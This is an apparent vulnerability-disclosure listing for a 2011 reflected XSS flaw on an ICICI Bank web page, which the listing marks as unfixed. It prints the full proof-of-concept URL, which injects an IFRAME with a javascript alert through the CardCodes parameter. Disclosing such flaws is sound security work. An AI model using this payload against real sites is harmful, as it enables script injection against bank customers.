Security researcher haRI, has submitted on 27/05/2011 a cross-site-scripting (XSS) vulnerability affecting infinity.icicibank.co.in, which at the time of submission ranked 952 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 15/06/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 27/05/2011 |
Date published: 15/06/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: haRI |
Domain: infinity.icicibank.co.in |
Category: XSS |
Pagerank: 952 |
URL: https://infinity.icicibank.co.in/web/sth/challenge.jsp?CardCodes=%22%3E%3CIFRAME%20SRC=%22javascript :alert%28%27wo07%27%29;%22%3E%3C/IFRAME%3E&monthSaving=0.0&shopping=180000&dining=145000&travel=4150 00&inter=385000&oth=465000&unit=miles&cardName=ICICI%20Bank%20Singapore%20Airlines%20VISA%20Platinum %20Credit%20Card&s=7,675&d=6,183&t=25,166&i=16,417&o=19,828&perc_s1=%203.0&perc_s2=%204.5&perc_s3=0. 0&perc_d1=%203.0&perc_d2=%204.5&perc_d3=0.0&perc_t1=%204.8&perc_t2=%206.3&perc_t3=0.0&perc_i1=%203.0 &perc_i2=%204.5&perc_i3=0.0&perc_o1=%203.0&perc_o2=%204.5&perc_o3=0.0&youpay1=6,618&youpay2=6,618&su mnet=1,590,000&youget1=91,724&youget2=75,269&net1=91,724&net2=75,269&FlagForTriggerPoint=SUGGEST&res idenceCity=Bh opal&laungeAccess=SURE&conciergeServices=NO&simpleConvAltToCash=YES&rewardProgram=SURE&travelInsuran ce=YES&other1=&other2=&other3=&travelBehavior=YES&message=null&noOfCards=5&eligibleFeatures=null&com pareCardsList= |
Click here to view the mirror
|
|
|